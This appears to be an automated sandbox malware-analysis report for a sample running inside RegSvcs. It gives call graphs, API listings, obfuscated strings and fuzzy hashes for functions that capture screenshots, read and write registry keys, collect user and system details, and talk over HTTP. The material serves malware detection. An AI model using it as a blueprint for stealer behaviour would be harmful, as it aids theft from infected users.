34680->34401 34683 42b667 34682->34683 34683->34404 34683->34683 34684->34448 34685->34453 34686->34467 34687->34481 34688->34495 34690 423114 _Yarn _Ref_count_obj 34689->34690 34691 42302b 
34689->34691 34690->34539 34691->34690 34692 4231a1 34691->34692 34696 4230c1 34691->34696 34697 42309a 34691->34697 34702 4230ab _Yarn 34691->34702 34707 4026a0 27 API calls 34692->34707 34694 4231a6 34708 4025c0 27 API calls 2 library calls 34694->34708 34696->34702 34706 4025c0 27 API calls 4 library calls 34696->34706 34697->34694 34705 4025c0 27 API calls 4 library calls 34697->34705 34698 4231ab 34701 42f02c 25 API calls 34701->34692 34702->34690 34702->34701 34703->34535 34705->34702 34706->34702 34708->34698 34710 423340 70 API calls 34709->34710 34711 40a2cc 34710->34711 34712 4061f0 114 API calls 34711->34712 34713 40a2d7 34712->34713 34714 424250 27 API calls 34713->34714 34715 40a32d 34714->34715 34716 424250 27 API calls 34715->34716 34717 40a389 34716->34717 34718 425740 27 API calls 34717->34718 34721 40a3a2 _Ref_count_obj 34718->34721 34719 40a43e _Ref_count_obj 34722 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34719->34722 34720 40a465 34723 42f02c 25 API calls 34720->34723 34721->34719 34721->34720 34724 40a461 34722->34724 34725 40a46a 34723->34725 34724->34548 34726->34676 34730 420d20 34727->34730 34728 423340 70 API calls 34728->34730 34729 4061f0 114 API calls 34729->34730 34730->34728 34730->34729 34733 41eca0 34730->34733 34734 41ecdc 34733->34734 34739 41f3ce _Ref_count_obj 34733->34739 34735 423340 70 API calls 34734->34735 34734->34739 34738 41ecfd 34735->34738 34736 41f444 _Ref_count_obj 34740 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34736->34740 34737 41f4a1 34742 42f02c 25 API calls 34737->34742 34741 4061f0 114 API calls 34738->34741 34739->34736 34739->34737 34743 41f466 Sleep 34740->34743 34744 41ed04 34741->34744 34745 41f4a6 34742->34745 34743->34730 34746 423340 70 API calls 34744->34746 34747 41ed16 34746->34747 34748 423340 70 API calls 34747->34748 34749 41ed28 34748->34749 34855 4105b0 34749->34855 34752 423340 70 API calls 34753 41ed49 34752->34753 34754 423340 70 API calls 
34753->34754 34755 41ed61 34754->34755 34756 4061f0 114 API calls 34755->34756 34757 41ed68 34756->34757 34886 409c20 34757->34886 34760 41efe9 34762 423340 70 API calls 34760->34762 34820 41f488 34760->34820 34761 423340 70 API calls 34763 41ed90 34761->34763 34764 41f01b 34762->34764 34765 423340 70 API calls 34763->34765 34766 423340 70 API calls 34764->34766 34767 41eda8 34765->34767 34768 41f030 34766->34768 34769 4061f0 114 API calls 34767->34769 34770 423340 70 API calls 34768->34770 34771 41edaf 34769->34771 34772 41f042 34770->34772 34773 409c20 27 API calls 34771->34773 34774 4105b0 121 API calls 34772->34774 34776 41edbb 34773->34776 34775 41f04e 34774->34775 34777 423340 70 API calls 34775->34777 34776->34760 34779 423340 70 API calls 34776->34779 34778 41f063 34777->34778 34780 423340 70 API calls 34778->34780 34781 41edd8 34779->34781 34782 41f07b 34780->34782 34783 4061f0 114 API calls 34781->34783 34784 4061f0 114 API calls 34782->34784 34787 41ede0 34783->34787 34785 41f082 34784->34785 34786 409c20 27 API calls 34785->34786 34788 41f08e 34786->34788 34789 424250 27 API calls 34787->34789 34790 423340 70 API calls 34788->34790 34791 41f35b _Ref_count_obj 34788->34791 34792 41ee4e 34789->34792 34793 41f0aa 34790->34793 34791->34739 34794 41f49c 34791->34794 34795 423280 25 API calls 34792->34795 34796 423340 70 API calls 34793->34796 34797 42f02c 25 API calls 34794->34797 34802 41ee5a _Ref_count_obj 34795->34802 34798 41f0c2 34796->34798 34797->34737 34799 4061f0 114 API calls 34798->34799 34800 41f0c9 34799->34800 34801 409c20 27 API calls 34800->34801 34804 41f0d5 34801->34804 34803 423340 70 API calls 34802->34803 34805 41eed5 34803->34805 34804->34791 34807 423340 70 API calls 34804->34807 34806 4061f0 114 API calls 34805->34806 34810 41eedd 34806->34810 34808 41f0f2 34807->34808 34809 4061f0 114 API calls 34808->34809 34814 41f0fa 34809->34814 34811 424250 27 API calls 34810->34811 34812 41ef3b 34811->34812 34813 423280 25 API calls 
34812->34813 34824 41ef47 _Ref_count_obj 34813->34824 34815 41f483 34814->34815 34816 41f14b 34814->34816 34901 424760 27 API calls 34815->34901 34817 424250 27 API calls 34816->34817 34819 41f168 34817->34819 34822 423280 25 API calls 34819->34822 34902 42869c 27 API calls 2 library calls 34820->34902 34831 41f174 _Ref_count_obj 34822->34831 34823 41f492 34827 42f02c 25 API calls 34823->34827 34824->34760 34898 40b5f0 114 API calls 3 library calls 34824->34898 34826 41efc1 34826->34760 34899 431262 14 API calls __dosmaperr 34826->34899 34828 41f497 34827->34828 34832 42f02c 25 API calls 34828->34832 34829 41f1d6 _Ref_count_obj 34833 423340 70 API calls 34829->34833 34831->34823 34831->34829 34832->34794 34835 41f1ef 34833->34835 34834 41efca 34836 431b97 40 API calls 34834->34836 34837 4061f0 114 API calls 34835->34837 34836->34760 34838 41f1f7 34837->34838 34839 424250 27 API calls 34838->34839 34840 41f255 34839->34840 34841 423280 25 API calls 34840->34841 34844 41f261 _Ref_count_obj 34841->34844 34842 41f2c3 _Ref_count_obj 34843 423340 70 API calls 34842->34843 34845 41f2de 34843->34845 34844->34828 34844->34842 34846 423340 70 API calls 34845->34846 34847 41f2f3 34846->34847 34848 423340 70 API calls 34847->34848 34849 41f30e 34848->34849 34850 4061f0 114 API calls 34849->34850 34851 41f315 34850->34851 34852 424250 27 API calls 34851->34852 34853 41f352 34852->34853 34900 41e870 114 API calls 2 library calls 34853->34900 34856 410602 34855->34856 34857 410a07 34855->34857 34856->34857 34859 410616 Sleep InternetOpenW InternetConnectA 34856->34859 34858 424250 27 API calls 34857->34858 34865 4109b4 _Ref_count_obj 34858->34865 34860 423340 70 API calls 34859->34860 34861 4106a2 34860->34861 34863 4061f0 114 API calls 34861->34863 34862 410adb 34864 42f02c 25 API calls 34862->34864 34867 4106ad HttpOpenRequestA 34863->34867 34868 410ae0 34864->34868 34865->34862 34869 410a02 _Ref_count_obj 34865->34869 34866 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 
API calls 34870 410ac8 34866->34870 34872 4106d6 _Ref_count_obj 34867->34872 34869->34866 34870->34752 34873 423340 70 API calls 34872->34873 34874 41073e 34873->34874 34875 4061f0 114 API calls 34874->34875 34876 410749 34875->34876 34877 423340 70 API calls 34876->34877 34878 410762 34877->34878 34879 4061f0 114 API calls 34878->34879 34880 41076d HttpSendRequestA 34879->34880 34882 410790 _Ref_count_obj 34880->34882 34883 410818 InternetReadFile 34882->34883 34884 41083f _Yarn 34883->34884 34885 4108bf InternetReadFile 34884->34885 34885->34884 34894 409c7c _Ref_count_obj 34886->34894 34895 409d43 _Ref_count_obj 34886->34895 34887 409e0a 34903 424760 27 API calls 34887->34903 34888 424250 27 API calls 34888->34894 34890 409de3 _Ref_count_obj 34892 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34890->34892 34891 409e0f 34893 42f02c 25 API calls 34891->34893 34896 409e06 34892->34896 34897 409e14 34893->34897 34894->34887 34894->34888 34894->34891 34894->34895 34895->34890 34895->34891 34896->34760 34896->34761 34898->34826 34899->34834 34900->34791
APIs
• RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 0040639C
• RegQueryValueExA.KERNELBASE(A99F1BC9,?,00000000,00000000,?,00000400,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063CA
• RegCloseKey.KERNELBASE(A99F1BC9,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063D6
• RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 004064E3
• RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00406511
• RegCloseKey.ADVAPI32(80000001), ref: 0040651A
• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0040663C
• RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0040665F
  • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 004067BD
  • Part of subcall function 004061F0: RegQueryInfoKeyW.ADVAPI32 ref: 00406894
  • Part of subcall function 004061F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 004068E0
• RegCloseKey.ADVAPI32(80000002), ref: 00406668
• RegCloseKey.ADVAPI32(?), ref: 00406D5E
• GdiplusStartup.GDIPLUS(?,?,00000000,A99F1BC9,00000000), ref: 00406DEA
• GetDC.USER32 ref: 00406F62
• RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004071CD
• GetSystemMetrics.USER32(00000000), ref: 00407226
• GetSystemMetrics.USER32(00000000), ref: 0040722F
• RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 00407277
• GetSystemMetrics.USER32(00000001), ref: 004072CA
• GetSystemMetrics.USER32(00000001), ref: 004072D3
• CreateCompatibleDC.GDI32(?), ref: 004072DF
• CreateCompatibleBitmap.GDI32 ref: 004072F4
• SelectObject.GDI32(00000000,00000000), ref: 00407304
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0040732A
• GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 0040733E
• GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 0040735A
• GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00407387
• GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 0040740E
• SelectObject.GDI32(00000000,?), ref: 0040741B
• DeleteObject.GDI32 ref: 00407428
• DeleteObject.GDI32 ref: 00407430
• ReleaseDC.USER32(00000000,?), ref: 0040743A
• GdipDisposeImage.GDIPLUS(00000000), ref: 00407441
• GdiplusShutdown.GDIPLUS(?), ref: 004074E3
• GetUserNameA.ADVAPI32 ref: 004075BA
• LookupAccountNameA.ADVAPI32 ref: 00407600
• GetSidIdentifierAuthority.ADVAPI32(?), ref: 0040760D
• GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407721
• GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00407748
Strings
Memory Dump Source
• Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
                                                      • String ID: $($JNQu7I==$LNKu7I==$MypyFvpRFOk=$MypyFvpRFXY=$MypyFvpRFeI=$MypyFvpRFeM=$NtUnmapViewOfSection$UtPn5zJk$VhamSOYAKv==$XypyFvp=$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                      • API String ID: 1729688432-3865892106
                                                      • Opcode ID: dd4e930bae907b470c58cdb3144f96f2cf78295685fe69f6e875f319f5d3e0da
                                                      • Instruction ID: 1abf1203684e5725369dd6c775d85895287d1c8d53bdd134cb033388427fe81f
                                                      • Opcode Fuzzy Hash: dd4e930bae907b470c58cdb3144f96f2cf78295685fe69f6e875f319f5d3e0da
                                                      • Instruction Fuzzy Hash: BED22571A001189BDB14DF28CD85BDDBB75EF45304F5082AEF809A72D2DB389A94CF99
                                                      APIs
                                                        • Part of subcall function 0040A270: GetTempPathA.KERNEL32(00000104,?,A99F1BC9,?,00000000), ref: 0040A2B7
                                                      • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0040B77B
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 0040639C
                                                        • Part of subcall function 004061F0: RegQueryValueExA.KERNELBASE(A99F1BC9,?,00000000,00000000,?,00000400,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063CA
                                                        • Part of subcall function 004061F0: RegCloseKey.KERNELBASE(A99F1BC9,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063D6
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040B8B5
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040B9EF
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 004064E3
                                                        • Part of subcall function 004061F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00406511
                                                        • Part of subcall function 004061F0: RegCloseKey.ADVAPI32(80000001), ref: 0040651A
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040BB29
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040BC63
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0040663C
                                                        • Part of subcall function 004061F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0040665F
                                                        • Part of subcall function 004061F0: RegCloseKey.ADVAPI32(80000002), ref: 00406668
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040BD9D
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040BED7
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 004067BD
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040C011
                                                        • Part of subcall function 004061F0: RegQueryInfoKeyW.ADVAPI32 ref: 00406894
                                                        • Part of subcall function 004061F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 004068E0
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040C14B
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040C285
                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0040C3BF
                                                        • Part of subcall function 004061F0: RegCloseKey.ADVAPI32(?), ref: 00406D5E
                                                      • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0040C4FF
                                                        • Part of subcall function 004093D0: GetVersionExW.KERNEL32(0000011C,A99F1BC9,74DF0F00), ref: 0040944A
                                                        • Part of subcall function 004093D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004094AB
                                                        • Part of subcall function 004093D0: GetProcAddress.KERNEL32(00000000), ref: 004094B2
                                                        • Part of subcall function 004093D0: GetNativeSystemInfo.KERNELBASE(?), ref: 00409573
                                                        • Part of subcall function 004093D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409577
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
                                                      • String ID: QQOJ$QSOr6et=$QXYv5UGm$RQCHOs==$ThYA7yYl$UXYy4yYq
                                                      • API String ID: 3951112935-997252642
                                                      • Opcode ID: 60f4cf93c0276b7fde3b0be49ab871fb8c7d27612ddd5aa59fc6009b65d4f455
                                                      • Instruction ID: f22fc8433aec9f4319cb189039e98dccb5235e087b45ad788ffb1db5e1f2873b
                                                      • Opcode Fuzzy Hash: 60f4cf93c0276b7fde3b0be49ab871fb8c7d27612ddd5aa59fc6009b65d4f455
                                                      • Instruction Fuzzy Hash: B592F271A00104DBEF18DBB8CD857DDBB72AB46314F64822EE410B73D6D77E5A808B5A

                                                      Control-flow Graph
                                                      APIs
                                                      • GetUserNameA.ADVAPI32 ref: 0040E91D
                                                      • CoInitialize.OLE32(00000000), ref: 0040EC54
                                                      • CoCreateInstance.OLE32(0045DFB0,00000000,00000001,0045E010,?), ref: 0040EC73
                                                      • CoUninitialize.OLE32 ref: 0040EC81
                                                      • CoUninitialize.OLE32 ref: 0040F055
                                                      • CoUninitialize.OLE32 ref: 0040F06C
                                                      • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F455
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Uninitialize$CreateInitializeInstanceNameUser
                                                      • String ID: @3P$DLdvEKPkEN0=$LNPPv9==$LNPvEKPk$UzYVOs==$aCG26vdmEr==$aCG26zBXEt8=
                                                      • API String ID: 1775936440-2745974841
                                                      • Opcode ID: 8dbe1dc47cfbc14bb988722cbb829c540bea7da7def1ee1fa22d68c10a15f972
                                                      • Instruction ID: d94c59ba96bf58fdea2299b4189d095cea6882005b870254fb1f8c5aa26f2192
                                                      • Opcode Fuzzy Hash: 8dbe1dc47cfbc14bb988722cbb829c540bea7da7def1ee1fa22d68c10a15f972
                                                      • Instruction Fuzzy Hash: 4062D071A002289FDF24DF24CD88BDDB7B5AF49304F5085E9E809A7291DB399B88CF55

                                                      Control-flow Graph
                                                      APIs
                                                      • Sleep.KERNELBASE(000005DC,A99F1BC9,?,00000000), ref: 00410642
                                                      • InternetOpenW.WININET(0045DB58,00000000,00000000,00000000,00000000), ref: 00410651
                                                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00410675
                                                      • HttpOpenRequestA.WININET(?,00000000), ref: 004106BF
                                                      • HttpSendRequestA.WININET(?,00000000), ref: 0041077F
                                                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 00410831
                                                      • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 004108E0
                                                      • InternetCloseHandle.WININET(?), ref: 00410907
                                                      • InternetCloseHandle.WININET(?), ref: 0041090F
                                                      • InternetCloseHandle.WININET(?), ref: 00410917
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                      • String ID: UzYVOs==$aCG26vdmEr==$aCG26zBXEt8=$invalid stoi argument$stoi argument out of range
                                                      • API String ID: 1439999335-2534103556
                                                      • Opcode ID: 18dda18013ec16b020916997e5ab615e17d0b909853951990ecdae6b3ded0351
                                                      • Instruction ID: 2e690d232329263d9ab4458541f63023bbecdb709bd55ac3ccf9d53c9ca6ac71
                                                      • Opcode Fuzzy Hash: 18dda18013ec16b020916997e5ab615e17d0b909853951990ecdae6b3ded0351
                                                      • Instruction Fuzzy Hash: E1B1C5B16102189BDB24DF28CC84BDEBB75EF45344F5041AAF909972D2D7B89AC0CF99

                                                      Control-flow Graph
                                                      APIs
                                                      • GetVersionExW.KERNEL32(0000011C,A99F1BC9,74DF0F00), ref: 0040944A
                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004094AB
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004094B2
                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00409573
                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409577
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                                                      • String ID: MepAF9==$MepAGI==$MepzG9==$MepzHI==
                                                      • API String ID: 374719553-2967035976
                                                      • Opcode ID: 7181936110e7d870de8c12fa1c602ce8ffe776a14a577e8357ace3040553704a
                                                      • Instruction ID: 526a03539c261f4202bfb8ced3c8a055484567f0761060618e7847c9c87492ba
                                                      • Opcode Fuzzy Hash: 7181936110e7d870de8c12fa1c602ce8ffe776a14a577e8357ace3040553704a
                                                      • Instruction Fuzzy Hash: 37020871E00254ABDB14EB68DC5639E77719B45714F5002AEE8056B3C3EB3D4E808BCB

                                                      Control-flow Graph
                                                      APIs
                                                      • _free.LIBCMT ref: 0043EA4B
                                                      • _free.LIBCMT ref: 0043EC17
                                                      • _free.LIBCMT ref: 0043EC8F
                                                      • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0043EE50,?,?,00000000), ref: 0043ECA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$InformationTimeZone
                                                      • String ID: Eastern Standard Time$Eastern Summer Time$PC$PC$XC
                                                      • API String ID: 597776487-2916830766
                                                      • Opcode ID: bccf74229683a265bf2189c4831500a881b958bb7c632b10747b3e7857b7b577
                                                      • Instruction ID: e60bc0aa405f7f4db4b80e96c1ff7416ed8d32a2361415e233af50b5757bc386
                                                      • Opcode Fuzzy Hash: bccf74229683a265bf2189c4831500a881b958bb7c632b10747b3e7857b7b577
                                                      • Instruction Fuzzy Hash: 24A12671901215ABDB10AFA7DC42AAF7BB8EF08314F14506FF901A72D1E7789E01CB99

                                                      Control-flow Graph
                                                      APIs
                                                      • GetVersionExW.KERNEL32(0000011C,A99F1BC9,74DF0F00), ref: 0040944A
                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004094AB
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004094B2
                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00409573
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                      • String ID:
                                                      • API String ID: 2167034304-0
                                                      • Opcode ID: c6c10183ea958272209e3d5f2c441c781a214321634d0b86db87c7ec6917dcd1
                                                      • Instruction ID: 6ce00a51f6f38b025a26ba68c37734fa0c93095d71df8d333d2419daf241495d
                                                      • Opcode Fuzzy Hash: c6c10183ea958272209e3d5f2c441c781a214321634d0b86db87c7ec6917dcd1
                                                      • Instruction Fuzzy Hash: 36C10671E001149BDB14DF68DD85B9EB775EB49314F5082AEE814AB2C2DB389E80CB99
                                                      APIs
                                                        • Part of subcall function 004061F0: GetUserNameA.ADVAPI32 ref: 004075BA
                                                        • Part of subcall function 004061F0: LookupAccountNameA.ADVAPI32 ref: 00407600
                                                        • Part of subcall function 004061F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 0040760D
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0041F592
                                                      • RegCloseKey.KERNELBASE(80000002), ref: 0041F5A8
                                                      • GetUserNameA.ADVAPI32 ref: 0041F632
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041F6BD
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 0040639C
                                                        • Part of subcall function 004061F0: RegQueryValueExA.KERNELBASE(A99F1BC9,?,00000000,00000000,?,00000400,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063CA
                                                        • Part of subcall function 004061F0: RegCloseKey.KERNELBASE(A99F1BC9,?,?,00000000,00000001,A99F1BC9,A99F1BC9), ref: 004063D6
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 004064E3
                                                        • Part of subcall function 004061F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00406511
                                                        • Part of subcall function 004061F0: RegCloseKey.ADVAPI32(80000001), ref: 0040651A
                                                        • Part of subcall function 004061F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0040663C
                                                        • Part of subcall function 004061F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0040665F
                                                        • Part of subcall function 004061F0: RegCloseKey.ADVAPI32(80000002), ref: 00406668
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
                                                      • String ID: 246122658369$26467e$NNTzFs==$System$V$YSN8$YSx8$Yh 8$ZBP8$aRF8$bCN8$bX28$bYB8$cBB8$cXF8$ceP=$dRT8$diB8
                                                      • API String ID: 4106312383-3121494839
                                                      • Opcode ID: 398ddd5d0ef88610d9970279faba03fd88ce918896392dabd0b45a58d72759e2
                                                      • Instruction ID: e7717660ce22f1301982580ddf77cf5500e32532105c492a5e46472f1cedce7e
                                                      • Opcode Fuzzy Hash: 398ddd5d0ef88610d9970279faba03fd88ce918896392dabd0b45a58d72759e2
                                                      • Instruction Fuzzy Hash: BED21A71A001688BEB29DB28DE897DDBA769F82304F9081DDE408A72D7D7394FC48F55

                                                      Control-flow Graph

• Graph rendering omitted; function entry at 0043EC2F (node and edge data not reproduced)
                                                      APIs
                                                      • GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,0043EE50,?,?,00000000), ref: 0043ECA1
                                                      • _free.LIBCMT ref: 0043EC8F
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 0043EE59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID: Eastern Standard Time$Eastern Summer Time$PC$XC
                                                      • API String ID: 2155170405-467152466
                                                      • Opcode ID: f5e65e2b1882837ef4a1d0857077e9e3a8a17de7a9a0f4c2296c0059c4963ff1
                                                      • Instruction ID: 1bb49f5745b54445c7c9fd8f71209821471ce9ef43585df445a876e9104ab678
                                                      • Opcode Fuzzy Hash: f5e65e2b1882837ef4a1d0857077e9e3a8a17de7a9a0f4c2296c0059c4963ff1
                                                      • Instruction Fuzzy Hash: AC51F671901225AACB10AFA7DC06A9E7B78EF08354F10516FF414A72D1EBB89E05CB99

                                                      Control-flow Graph

• Graph rendering omitted; function entry at 0043080C (node and edge data not reproduced)
                                                      APIs
                                                      • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0043073E), ref: 0043082E
                                                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00430888
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0043073E,?,000000FF,00000000,00000000), ref: 00430916
                                                      • __dosmaperr.LIBCMT ref: 0043091D
                                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0043095A
                                                        • Part of subcall function 00430B82: __dosmaperr.LIBCMT ref: 00430BB7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                      • String ID:
                                                      • API String ID: 1206951868-0
                                                      • Opcode ID: 749dbd5d499d1470d264ec04480df794728a01329d0d6bbc761b316cee2ec38d
